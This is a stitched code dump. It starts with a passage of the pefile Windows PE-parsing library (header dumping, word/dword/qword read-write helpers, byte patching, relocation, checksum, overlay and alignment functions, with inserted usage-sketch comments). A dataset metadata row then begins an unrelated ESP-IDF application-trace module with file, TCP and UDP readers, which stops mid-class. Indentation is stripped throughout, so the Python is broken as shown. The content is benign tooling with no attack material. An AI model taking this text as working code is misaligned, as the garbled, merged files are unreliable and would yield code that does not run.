image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
dump_dict['Flags'] = list()
for flag in image_flags:
if getattr(self.FILE_HEADER, flag[0]):
dump_dict['Flags'].append(flag[0])
if hasattr(self, 'OPTIONAL_HEADER') and self.OPTIONAL_HEADER is not None:
dump_dict['OPTIONAL_HEADER'] = self.OPTIONAL_HEADER.dump_dict()
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
dump_dict['DllCharacteristics'] = list()
for flag in dll_characteristics_flags:
if getattr(self.OPTIONAL_HEADER, flag[0]):
dump_dict['DllCharacteristics'].append(flag[0])
dump_dict['PE Sections'] = list()
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
for section in self.sections:
section_dict = section.dump_dict()
dump_dict['PE Sections'].append(section_dict)
section_dict['Flags'] = list()
for flag in section_flags:
if getattr(section, flag[0]):
section_dict['Flags'].append(flag[0])
section_dict['Entropy'] = section.get_entropy()
if md5 is not None:
section_dict['MD5'] = section.get_hash_md5()
if sha1 is not None:
section_dict['SHA1'] = section.get_hash_sha1()
if sha256 is not None:
section_dict['SHA256'] = section.get_hash_sha256()
if sha512 is not None:
section_dict['SHA512'] = section.get_hash_sha512()
if (hasattr(self, 'OPTIONAL_HEADER') and
hasattr(self.OPTIONAL_HEADER, 'DATA_DIRECTORY') ):
dump_dict['Directories'] = list()
for idx in xrange(len(self.OPTIONAL_HEADER.DATA_DIRECTORY)):
directory = self.OPTIONAL_HEADER.DATA_DIRECTORY[idx]
dump_dict['Directories'].append(directory.dump_dict())
def convert_char(char):
if char in string.ascii_letters or char in string.digits or char in string.punctuation or char in string.whitespace:
return char
else:
return r'\x%02x' % ord(char)
def convert_to_printable(s):
return ''.join([convert_char(c) for c in s])
if hasattr(self, 'VS_VERSIONINFO'):
dump_dict['Version Information'] = list()
dump_dict['Version Information'].append(self.VS_VERSIONINFO.dump_dict())
if hasattr(self, 'VS_FIXEDFILEINFO'):
dump_dict['Version Information'].append(self.VS_FIXEDFILEINFO.dump_dict())
if hasattr(self, 'FileInfo'):
fileinfo_list = list()
for entry in self.FileInfo:
fileinfo_list.append(entry.dump_dict())
if hasattr(entry, 'StringTable'):
stringtable_dict = dict()
for st_entry in entry.StringTable:
[fileinfo_list.append(line) for line in st_entry.dump_dict()]
stringtable_dict['LangID'] = st_entry.LangID
for str_entry in st_entry.entries.items():
stringtable_dict[convert_to_printable(str_entry[0])] = convert_to_printable(str_entry[1])
fileinfo_list.append(stringtable_dict)
elif hasattr(entry, 'Var'):
for var_entry in entry.Var:
var_dict = dict()
if hasattr(var_entry, 'entry'):
[fileinfo_list.append(line) for line in var_entry.dump_dict()]
var_dict[convert_to_printable(var_entry.entry.keys()[0])] = var_entry.entry.values()[0]
fileinfo_list.append(var_dict)
if hasattr(self, 'DIRECTORY_ENTRY_EXPORT'):
dump_dict['Exported symbols'] = list()
dump_dict['Exported symbols'].append(self.DIRECTORY_ENTRY_EXPORT.struct.dump_dict())
for export in self.DIRECTORY_ENTRY_EXPORT.symbols:
export_dict = dict()
if export.address is not None:
export_dict.update({'Ordinal': export.ordinal, 'RVA': export.address, 'Name': export.name})
if export.forwarder:
export_dict['forwarder'] = export.forwarder
dump_dict['Exported symbols'].append(export_dict)
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
dump_dict['Imported symbols'] = list()
for module in self.DIRECTORY_ENTRY_IMPORT:
import_list = list()
dump_dict['Imported symbols'].append(import_list)
import_list.append(module.struct.dump_dict())
for symbol in module.imports:
symbol_dict = dict()
if symbol.import_by_ordinal is True:
symbol_dict['DLL'] = module.dll
symbol_dict['Ordinal'] = symbol.ordinal
else:
symbol_dict['DLL'] = module.dll
symbol_dict['Name'] = symbol.name
symbol_dict['Hint'] = symbol.hint
if symbol.bound:
symbol_dict['Bound'] = symbol.bound
import_list.append(symbol_dict)
if hasattr(self, 'DIRECTORY_ENTRY_BOUND_IMPORT'):
dump_dict['Bound imports'] = list()
for bound_imp_desc in self.DIRECTORY_ENTRY_BOUND_IMPORT:
bound_imp_desc_dict = dict()
dump_dict['Bound imports'].append(bound_imp_desc_dict)
bound_imp_desc_dict.update(bound_imp_desc.struct.dump_dict())
bound_imp_desc_dict['DLL'] = bound_imp_desc.name
for bound_imp_ref in bound_imp_desc.entries:
bound_imp_ref_dict = dict()
bound_imp_ref_dict.update(bound_imp_ref.struct.dump_dict())
bound_imp_ref_dict['DLL'] = bound_imp_ref.name
if hasattr(self, 'DIRECTORY_ENTRY_DELAY_IMPORT'):
dump_dict['Delay Imported symbols'] = list()
for module in self.DIRECTORY_ENTRY_DELAY_IMPORT:
module_list = list()
dump_dict['Delay Imported symbols'].append(module_list)
module_list.append(module.struct.dump_dict())
for symbol in module.imports:
symbol_dict = dict()
if symbol.import_by_ordinal is True:
symbol_dict['DLL'] = module.dll
symbol_dict['Ordinal'] = symbol.ordinal
else:
symbol_dict['DLL'] = module.dll
symbol_dict['Name'] = symbol.name
symbol_dict['Hint'] = symbol.hint
if symbol.bound:
symbol_dict['Bound'] = symbol.bound
module_list.append(symbol_dict)
if hasattr(self, 'DIRECTORY_ENTRY_RESOURCE'):
dump_dict['Resource directory'] = list()
dump_dict['Resource directory'].append(self.DIRECTORY_ENTRY_RESOURCE.struct.dump_dict())
for resource_type in self.DIRECTORY_ENTRY_RESOURCE.entries:
resource_type_dict = dict()
if resource_type.name is not None:
resource_type_dict['Name'] = resource_type.name
else:
resource_type_dict['Id'] = (
resource_type.struct.Id, RESOURCE_TYPE.get(resource_type.struct.Id, '-'))
resource_type_dict.update(resource_type.struct.dump_dict())
dump_dict['Resource directory'].append(resource_type_dict)
if hasattr(resource_type, 'directory'):
directory_list = list()
directory_list.append(resource_type.directory.struct.dump_dict())
dump_dict['Resource directory'].append(directory_list)
for resource_id in resource_type.directory.entries:
resource_id_dict = dict()
if resource_id.name is not None:
resource_id_dict['Name'] = resource_id.name
else:
resource_id_dict['Id'] = resource_id.struct.Id
resource_id_dict.update(resource_id.struct.dump_dict())
directory_list.append(resource_id_dict)
if hasattr(resource_id, 'directory'):
resource_id_list = list()
resource_id_list.append(resource_id.directory.struct.dump_dict())
directory_list.append(resource_id_list)
for resource_lang in resource_id.directory.entries:
if hasattr(resource_lang, 'data'):
resource_lang_dict = dict()
resource_lang_dict['LANG'] = resource_lang.data.lang
resource_lang_dict['SUBLANG'] = resource_lang.data.sublang
resource_lang_dict['LANG_NAME'] = LANG.get(resource_lang.data.lang, '*unknown*')
resource_lang_dict['SUBLANG_NAME'] = get_sublang_name_for_lang(resource_lang.data.lang, resource_lang.data.sublang)
resource_lang_dict.update(resource_lang.struct.dump_dict())
resource_lang_dict.update(resource_lang.data.struct.dump_dict())
resource_id_list.append(resource_lang_dict)
if hasattr(resource_id.directory, 'strings') and resource_id.directory.strings:
for idx, res_string in resource_id.directory.strings.items():
resource_id_list.append(convert_to_printable(res_string))
if ( hasattr(self, 'DIRECTORY_ENTRY_TLS') and
self.DIRECTORY_ENTRY_TLS and
self.DIRECTORY_ENTRY_TLS.struct ):
dump_dict['TLS'] = self.DIRECTORY_ENTRY_TLS.struct.dump_dict()
if ( hasattr(self, 'DIRECTORY_ENTRY_LOAD_CONFIG') and
self.DIRECTORY_ENTRY_LOAD_CONFIG and
self.DIRECTORY_ENTRY_LOAD_CONFIG.struct ):
dump_dict['LOAD_CONFIG'] = self.DIRECTORY_ENTRY_LOAD_CONFIG.struct.dump_dict()
if hasattr(self, 'DIRECTORY_ENTRY_DEBUG'):
dump_dict['Debug information'] = list()
for dbg in self.DIRECTORY_ENTRY_DEBUG:
dbg_dict = dict()
dump_dict['Debug information'].append(dbg_dict)
dbg_dict.update(dbg.struct.dump_dict())
dbg_dict['Type'] = DEBUG_TYPE.get(dbg.struct.Type, dbg.struct.Type)
if hasattr(self, 'DIRECTORY_ENTRY_BASERELOC'):
dump_dict['Base relocations'] = list()
for base_reloc in self.DIRECTORY_ENTRY_BASERELOC:
base_reloc_list = list()
dump_dict['Base relocations'].append(base_reloc_list)
base_reloc_list.append(base_reloc.struct.dump_dict())
for reloc in base_reloc.entries:
reloc_dict = dict()
base_reloc_list.append(reloc_dict)
reloc_dict['RVA'] = reloc.rva
try:
reloc_dict['Type'] = RELOCATION_TYPE[reloc.type][16:]
except KeyError:
reloc_dict['Type'] = reloc.type
return dump_dict
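# Usage sketch: serializing the dictionary dump to JSON, assuming the enclosing
# class is instantiated as pefile.PE(path). Some values may not be directly
# JSON serializable, so a fallback conversion to str is used.
#
#   import json
#   import pefile
#   pe = pefile.PE('sample.exe')
#   with open('sample_report.json', 'w') as report:
#       json.dump(pe.dump_dict(), report, default=str, indent=2)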
# OC Patch
def get_physical_by_rva(self, rva):
"""Gets the physical address in the PE file from an RVA value."""
try:
return self.get_offset_from_rva(rva)
except Exception:
return None
##
# Double-Word get / set
##
def get_data_from_dword(self, dword):
"""Return a four byte string representing the double word value. (little endian)."""
return struct.pack('<L', dword & 0xffffffff)
def get_dword_from_data(self, data, offset):
"""Convert four bytes of data to a double word (little endian)
'offset' is assumed to index into a dword array. So setting it to
N will return a dword out of the data starting at offset N*4.
Returns None if the data can't be turned into a double word.
"""
if (offset+1)*4 > len(data):
return None
return struct.unpack('<I', data[offset*4:(offset+1)*4])[0]
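# Worked example of the indexing semantics above, assuming 'pe' is an instance
# of the enclosing class; the byte values are hypothetical:
#
#   import struct
#   data = struct.pack('<II', 0x11223344, 0x55667788)   # 8 bytes of sample data
#   pe.get_dword_from_data(data, 0)   # -> 0x11223344
#   pe.get_dword_from_data(data, 1)   # -> 0x55667788
#   pe.get_dword_from_data(data, 2)   # -> None, past the end of the buffer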
def get_dword_at_rva(self, rva):
"""Return the double word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_dword_from_data(self.get_data(rva, 4), 0)
except PEFormatError:
return None
def get_dword_from_offset(self, offset):
"""Return the double word value at the given file offset. (little endian)"""
if offset+4 > len(self.__data__):
return None
return self.get_dword_from_data(self.__data__[offset:offset+4], 0)
def set_dword_at_rva(self, rva, dword):
"""Set the double word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_dword(dword))
def set_dword_at_offset(self, offset, dword):
"""Set the double word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_dword(dword))
##
# Word get / set
##
def get_data_from_word(self, word):
"""Return a two byte string representing the word value. (little endian)."""
return struct.pack('<H', word)
def get_word_from_data(self, data, offset):
"""Convert two bytes of data to a word (little endian)
'offset' is assumed to index into a word array. So setting it to
N will return a word out of the data starting at offset N*2.
Returns None if the data can't be turned into a word.
"""
if (offset+1)*2 > len(data):
return None
return struct.unpack('<H', data[offset*2:(offset+1)*2])[0]
def get_word_at_rva(self, rva):
"""Return the word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_word_from_data(self.get_data(rva)[:2], 0)
except PEFormatError:
return None
def get_word_from_offset(self, offset):
"""Return the word value at the given file offset. (little endian)"""
if offset+2 > len(self.__data__):
return None
return self.get_word_from_data(self.__data__[offset:offset+2], 0)
def set_word_at_rva(self, rva, word):
"""Set the word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_word(word))
def set_word_at_offset(self, offset, word):
"""Set the word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_word(word))
##
# Quad-Word get / set
##
def get_data_from_qword(self, word):
"""Return a eight byte string representing the quad-word value. (little endian)."""
return struct.pack('<Q', word)
def get_qword_from_data(self, data, offset):
"""Convert eight bytes of data to a word (little endian)
'offset' is assumed to index into a word array. So setting it to
N will return a dword out of the data starting at offset N*8.
Returns None if the data can't be turned into a quad word.
"""
if (offset+1)*8 > len(data):
return None
return struct.unpack('<Q', data[offset*8:(offset+1)*8])[0]
def get_qword_at_rva(self, rva):
"""Return the quad-word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_qword_from_data(self.get_data(rva)[:8], 0)
except PEFormatError:
return None
def get_qword_from_offset(self, offset):
"""Return the quad-word value at the given file offset. (little endian)"""
if offset+8 > len(self.__data__):
return None
return self.get_qword_from_data(self.__data__[offset:offset+8], 0)
def set_qword_at_rva(self, rva, qword):
"""Set the quad-word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_qword(qword))
def set_qword_at_offset(self, offset, qword):
"""Set the quad-word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_qword(qword))
##
# Set bytes
##
def set_bytes_at_rva(self, rva, data):
"""Overwrite, with the given string, the bytes at the file offset corresponding to the given RVA.
Return True if successful, False otherwise. It can fail if the
offset is outside the file's boundaries.
"""
if not isinstance(data, str):
raise TypeError('data should be of type: str')
offset = self.get_physical_by_rva(rva)
if not offset:
return False
return self.set_bytes_at_offset(offset, data)
def set_bytes_at_offset(self, offset, data):
"""Overwrite the bytes at the given file offset with the given string.
Return True if successful, False otherwise. It can fail if the
offset is outside the file's boundaries.
"""
if not isinstance(data, str):
raise TypeError('data should be of type: str')
if offset >= 0 and offset < len(self.__data__):
self.__data__ = ( self.__data__[:offset] + data + self.__data__[offset+len(data):] )
else:
return False
return True
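# Usage sketch: patching a double word at an RVA and saving the modified file,
# assuming the enclosing class is pefile.PE and that it exposes write(). The
# RVA, patch value and file names are placeholders.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   if pe.set_dword_at_rva(0x1000, 0x90909090):
#       pe.write(filename='sample_patched.exe')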
def merge_modified_section_data(self):
"""Update the PE image content with any individual section data that has been modified."""
for section in self.sections:
section_data_start = self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment )
section_data_end = section_data_start+section.SizeOfRawData
if section_data_start < len(self.__data__) and section_data_end < len(self.__data__):
self.__data__ = self.__data__[:section_data_start] + section.get_data() + self.__data__[section_data_end:]
def relocate_image(self, new_ImageBase):
"""Apply the relocation information to the image using the provided new image base.
This method will apply the relocation information to the image. Given the new base,
all the relocations will be processed and both the raw data and the section's data
will be fixed accordingly.
The resulting image can also be retrieved through the method
get_memory_mapped_image() in order to get something that more closely
matches what could be found in memory once the Windows loader has
finished its work.
"""
relocation_difference = new_ImageBase - self.OPTIONAL_HEADER.ImageBase
for reloc in self.DIRECTORY_ENTRY_BASERELOC:
virtual_address = reloc.struct.VirtualAddress
size_of_block = reloc.struct.SizeOfBlock
# We iterate with an index because if the relocation is of type
# IMAGE_REL_BASED_HIGHADJ we need to also process the next entry
# at once and skip it for the next iteration
#
entry_idx = 0
while entry_idx<len(reloc.entries):
entry = reloc.entries[entry_idx]
entry_idx += 1
if entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_ABSOLUTE']:
# Nothing to do for this type of relocation
pass
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGH']:
# Fix the high 16-bits of a relocation
#
# Add high 16-bits of relocation_difference to the
# 16-bit value at RVA=entry.rva
self.set_word_at_rva(
entry.rva,
( self.get_word_at_rva(entry.rva) + relocation_difference>>16)&0xffff )
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_LOW']:
# Fix the low 16-bits of a relocation
#
# Add low 16 bits of relocation_difference to the 16-bit value
# at RVA=entry.rva
self.set_word_at_rva(
entry.rva,
( self.get_word_at_rva(entry.rva) + relocation_difference)&0xffff)
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHLOW']:
# Handle all high and low parts of a 32-bit relocation
#
# Add relocation_difference to the value at RVA=entry.rva
self.set_dword_at_rva(
entry.rva,
self.get_dword_at_rva(entry.rva)+relocation_difference)
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHADJ']:
# Fix the high 16-bits of a relocation and adjust
#
# Add high 16-bits of relocation_difference to the 32-bit value
# composed from the (16-bit value at RVA=entry.rva)<<16 plus
# the 16-bit value at the next relocation entry.
#
# If the next entry is beyond the array's limits,
# abort... the table is corrupt
#
if entry_idx == len(reloc.entries):
break
next_entry = reloc.entries[entry_idx]
entry_idx += 1
self.set_word_at_rva( entry.rva,
((self.get_word_at_rva(entry.rva)<<16) + next_entry.rva +
relocation_difference & 0xffff0000) >> 16 )
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_DIR64']:
# Apply the difference to the 64-bit value at the offset
# RVA=entry.rva
self.set_qword_at_rva(
entry.rva,
self.get_qword_at_rva(entry.rva) + relocation_difference)
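# Usage sketch: obtaining a memory mapped image rebased to a new base address.
# get_memory_mapped_image() applies the relocations via relocate_image() when
# an ImageBase is given (see its docstring above). The base value and file
# name are placeholders, and the class is assumed to be pefile.PE.
#
#   import pefile
#   pe = pefile.PE('sample.dll')
#   rebased = pe.get_memory_mapped_image(ImageBase=0x20000000)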
def verify_checksum(self):
return self.OPTIONAL_HEADER.CheckSum == self.generate_checksum()
def generate_checksum(self):
# This will make sure that the data representing the PE image
# is updated with any changes that might have been made by
# assigning values to header fields as those are not automatically
# updated upon assignment.
#
self.__data__ = self.write()
# Get the offset to the CheckSum field in the OptionalHeader
#
checksum_offset = self.OPTIONAL_HEADER.__file_offset__ + 0x40 # 64
checksum = 0
# Verify the data is dword-aligned. Add padding if needed
#
remainder = len(self.__data__) % 4
data_len = len(self.__data__) + ((4-remainder) * ( remainder != 0 ))
for i in xrange( data_len / 4 ):
# Skip the checksum field
if i == checksum_offset / 4:
continue
if i+1 == (data_len / 4) and remainder:
dword = struct.unpack('I', self.__data__[i*4:]+ ('\0' * (4-remainder)) )[0]
else:
dword = struct.unpack('I', self.__data__[ i*4 : i*4+4 ])[0]
# Optimized the calculation (thanks to Emmanuel Bourg for pointing it out!)
checksum += dword
if checksum > 2**32:
checksum = (checksum & 0xffffffff) + (checksum >> 32)
checksum = (checksum & 0xffff) + (checksum >> 16)
checksum = (checksum) + (checksum >> 16)
checksum = checksum & 0xffff
# The length is the one of the original data, not the padded one
#
return checksum + len(self.__data__)
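# Usage sketch: verifying the header checksum and, if it does not match,
# recomputing it before writing the file out again. Assumes the enclosing
# class is pefile.PE and exposes write(); file names are placeholders.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   if not pe.verify_checksum():
#       pe.OPTIONAL_HEADER.CheckSum = pe.generate_checksum()
#       pe.write(filename='sample_fixed.exe')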
def is_exe(self):
"""Check whether the file is a standard executable.
This will return true only if the file has the IMAGE_FILE_EXECUTABLE_IMAGE flag set
and the IMAGE_FILE_DLL not set and the file does not appear to be a driver either.
"""
EXE_flag = IMAGE_CHARACTERISTICS['IMAGE_FILE_EXECUTABLE_IMAGE']
if (not self.is_dll()) and (not self.is_driver()) and (
EXE_flag & self.FILE_HEADER.Characteristics) == EXE_flag:
return True
return False
def is_dll(self):
"""Check whether the file is a standard DLL.
This will return true only if the image has the IMAGE_FILE_DLL flag set.
"""
DLL_flag = IMAGE_CHARACTERISTICS['IMAGE_FILE_DLL']
if ( DLL_flag & self.FILE_HEADER.Characteristics) == DLL_flag:
return True
return False
def is_driver(self):
"""Check whether the file is a Windows driver.
This will return true only if there are reliable indicators of the image
being a driver.
"""
# Checking that the ImageBase field of the OptionalHeader is above or
# equal to 0x80000000 (that is, whether it lies in the upper 2GB of
# the address space, normally belonging to the kernel) is not a
# reliable enough indicator. For instance, PEs that play the invalid
# ImageBase trick to get relocated could be incorrectly assumed to be
# drivers.
# This is not reliable either...
#
# if any( (section.Characteristics & SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_NOT_PAGED']) for section in self.sections ):
# return True
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
# If it imports from "ntoskrnl.exe" or other kernel components it should be a driver
#
if set( ('ntoskrnl.exe', 'hal.dll', 'ndis.sys', 'bootvid.dll', 'kdcom.dll' ) ).intersection( [ imp.dll.lower() for imp in self.DIRECTORY_ENTRY_IMPORT ] ):
return True
return False
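# Usage sketch: classifying an image with the helpers above, assuming the
# enclosing class is instantiated as pefile.PE(path).
#
#   import pefile
#   pe = pefile.PE('sample.bin')
#   if pe.is_driver():
#       kind = 'driver'
#   elif pe.is_dll():
#       kind = 'DLL'
#   elif pe.is_exe():
#       kind = 'executable'
#   else:
#       kind = 'unknown'
#   print(kind)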
def get_overlay_data_start_offset(self):
"""Get the offset of data appended to the file and not contained within the area described in the headers."""
largest_offset_and_size = (0, 0)
def update_if_sum_is_larger_and_within_file(offset_and_size, file_size=len(self.__data__)):
if sum(offset_and_size) <= file_size and sum(offset_and_size) > sum(largest_offset_and_size):
return offset_and_size
return largest_offset_and_size
if hasattr(self, 'OPTIONAL_HEADER'):
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(self.OPTIONAL_HEADER.get_file_offset(), self.FILE_HEADER.SizeOfOptionalHeader))
for section in self.sections:
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(section.PointerToRawData, section.SizeOfRawData))
for directory in self.OPTIONAL_HEADER.DATA_DIRECTORY:
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(directory.VirtualAddress, directory.Size))
if len(self.__data__) > sum(largest_offset_and_size):
return sum(largest_offset_and_size)
return None
def get_overlay(self):
"""Get the data appended to the file and not contained within the area described in the headers."""
overlay_data_offset = self.get_overlay_data_start_offset()
if overlay_data_offset is not None:
return self.__data__[ overlay_data_offset : ]
return None
def trim(self):
"""Return the just data defined by the PE headers, removing any overlayed data."""
overlay_data_offset = self.get_overlay_data_start_offset()
if overlay_data_offset is not None:
return self.__data__[ : overlay_data_offset ]
return self.__data__[:]
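# Usage sketch: separating the overlay (data appended after the area covered
# by the headers) from the part of the file described by the PE headers.
# Assumes the enclosing class is pefile.PE; file names are placeholders.
#
#   import pefile
#   pe = pefile.PE('sample.exe')
#   overlay = pe.get_overlay()
#   if overlay is not None:
#       with open('sample.overlay.bin', 'wb') as out:
#           out.write(overlay)
#   with open('sample.trimmed.exe', 'wb') as out:
#       out.write(pe.trim())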
# According to http://corkami.blogspot.com/2010/01/parce-que-la-planche-aura-brule.html
# if PointerToRawData is less than 0x200 it's rounded to zero. Loading the test file
# in a debugger it's easy to verify that the PointerToRawData value of 1 is rounded
# to zero. Hence we reproduce the behavior
#
# According to the document:
# [ Microsoft Portable Executable and Common Object File Format Specification ]
# "The alignment factor (in bytes) that is used to align the raw data of sections in
# the image file. The value should be a power of 2 between 512 and 64 K, inclusive.
# The default is 512. If the SectionAlignment is less than the architecture's page
# size, then FileAlignment must match SectionAlignment."
#
# The following is a hard-coded constant in the Windows loader
def adjust_FileAlignment( self, val, file_alignment ):
global FileAlignment_Warning
if file_alignment > FILE_ALIGNEMNT_HARDCODED_VALUE:
# If it's not a power of two, report it:
if not power_of_two(file_alignment) and FileAlignment_Warning is False:
self.__warnings.append(
'If FileAlignment > 0x200 it should be a power of 2. Value: %x' % (
file_alignment) )
FileAlignment_Warning = True
if file_alignment < FILE_ALIGNEMNT_HARDCODED_VALUE:
return val
return (val / 0x200) * 0x200
# According to the document:
# [ Microsoft Portable Executable and Common Object File Format Specification ]
# "The alignment (in bytes) of sections when they are loaded into memory. It must be
# greater than or equal to FileAlignment. The default is the page size for the
# architecture."
#
def adjust_SectionAlignment( self, val, section_alignment, file_alignment ):
global SectionAlignment_Warning
if file_alignment < FILE_ALIGNEMNT_HARDCODED_VALUE:
if file_alignment != section_alignment and SectionAlignment_Warning is False:
self.__warnings.append(
'If FileAlignment(%x) < 0x200 it should equal SectionAlignment(%x)' % (
file_alignment, section_alignment) )
SectionAlignment_Warning = True
if section_alignment < 0x1000: # page size
section_alignment = file_alignment
# 0x200 is the minimum valid FileAlignment according to the documentation
# although ntoskrnl.exe has an alignment of 0x80 in some Windows versions
#
#elif section_alignment < 0x80:
# section_alignment = 0x80
if section_alignment and val % section_alignment:
return section_alignment * ( val / section_alignment )
return val
| 38.602235 | 166 | 0.574339 |
4ffe947d13be2de9e9b05205409a3e14f4ef137f | 21,494 | py | Python | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | ["Apache-2.0"] | null | null | null | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | ["Apache-2.0"] | null | null | null | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | ["Apache-2.0"] | null | null | null |
# SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
from __future__ import print_function
import os
import sys
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import os.path
import socketserver as SocketServer
import subprocess
import tempfile
import threading
import time
import elftools.elf.constants as elfconst
import elftools.elf.elffile as elffile
def clock():
if sys.version_info >= (3, 3):
return time.process_time()
else:
return time.clock()
def addr2line(toolchain, elf_path, addr):
"""
Resolves an address to a source line location using the toolchain's addr2line utility.
Parameters
----------
toolchain : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to use
addr : int
address to retrieve source line location
Returns
-------
string
source line location string
"""
try:
return subprocess.check_output(['%saddr2line' % toolchain, '-e', elf_path, '0x%x' % addr]).decode('utf-8')
except subprocess.CalledProcessError:
return ''
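# Usage sketch: resolving a code address to a source location. The toolchain
# prefix, ELF path and address below are placeholders.
#
#   line = addr2line('xtensa-esp32-elf-', 'build/app.elf', 0x400d2050)
#   print(line, end='')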
class ParseError(RuntimeError):
"""
Parse error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderError(RuntimeError):
"""
Trace reader error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderTimeoutError(ReaderError):
"""
Trace reader timeout error
"""
def __init__(self, tmo, sz):
ReaderError.__init__(self, 'Timeout %f sec while reading %d bytes!' % (tmo, sz))
class ReaderShutdownRequest(ReaderError):
"""
Trace reader shutdown request error
Raised when user presses CTRL+C (SIGINT).
"""
def __init__(self):
ReaderError.__init__(self, 'Shutdown request!')
class Reader:
"""
Base abstract reader class
"""
def __init__(self, tmo):
"""
Constructor
Parameters
----------
tmo : int
read timeout
"""
self.timeout = tmo
self.need_stop = False
def read(self, sz):
"""
Reads a number of bytes
Parameters
----------
sz : int
number of bytes to read
Returns
-------
bytes object
read bytes
Raises
------
ReaderTimeoutError
if timeout expires
ReaderShutdownRequest
if SIGINT was received during reading
"""
pass
def readline(self):
"""
Reads a line terminated by the OS line separator.
Returns
-------
string
read line
"""
pass
def forward(self, sz):
"""
Moves read pointer to a number of bytes
Parameters
----------
sz : int
number of bytes to read
"""
pass
def cleanup(self):
"""
Cleans up reader
"""
self.need_stop = True
class FileReader(Reader):
"""
File reader class
"""
def __init__(self, path, tmo):
"""
Constructor
Parameters
----------
path : string
path to file to read
tmo : int
see Reader.__init__()
"""
Reader.__init__(self, tmo)
self.trace_file_path = path
self.trace_file = open(path, 'rb')
def read(self, sz):
"""
see Reader.read()
"""
data = b''
start_tm = clock()
while not self.need_stop:
data += self.trace_file.read(sz - len(data))
if len(data) == sz:
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
return data
def get_pos(self):
"""
Retrieves current file read position
Returns
-------
int
read position
"""
return self.trace_file.tell()
def readline(self, linesep=os.linesep):
"""
see Reader.readline()
"""
line = ''
start_tm = clock()
while not self.need_stop:
line += self.trace_file.readline().decode('utf-8')
if line.endswith(linesep):
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, 1)
if self.need_stop:
raise ReaderShutdownRequest()
return line
def forward(self, sz):
"""
see Reader.forward()
"""
cur_pos = self.trace_file.tell()
start_tm = clock()
while not self.need_stop:
file_sz = os.path.getsize(self.trace_file_path)
if file_sz - cur_pos >= sz:
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
self.trace_file.seek(sz, os.SEEK_CUR)
class NetRequestHandler:
"""
Handler for incoming network requests (connections, datagrams)
"""
def handle(self):
while not self.server.need_stop:
data = self.rfile.read(1024)
if len(data) == 0:
break
self.server.wtrace.write(data)
self.server.wtrace.flush()
class NetReader(FileReader):
"""
Base network socket reader class
"""
def __init__(self, tmo):
"""
see Reader.__init__()
"""
fhnd,fname = tempfile.mkstemp()
FileReader.__init__(self, fname, tmo)
self.wtrace = os.fdopen(fhnd, 'wb')
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def cleanup(self):
"""
see Reader.cleanup()
"""
FileReader.cleanup(self)
self.shutdown()
self.server_close()
self.server_thread.join()
time.sleep(0.1)
self.trace_file.close()
self.wtrace.close()
class TCPRequestHandler(NetRequestHandler, SocketServer.StreamRequestHandler):
"""
Handler for incoming TCP connections
"""
pass
class TCPReader(NetReader, SocketServer.TCPServer):
"""
TCP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.TCPServer.__init__(self, (host, port), TCPRequestHandler)
NetReader.__init__(self, tmo)
class UDPRequestHandler(NetRequestHandler, SocketServer.DatagramRequestHandler):
"""
Handler for incoming UDP datagrams
"""
pass
class UDPReader(NetReader, SocketServer.UDPServer):
"""
UDP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
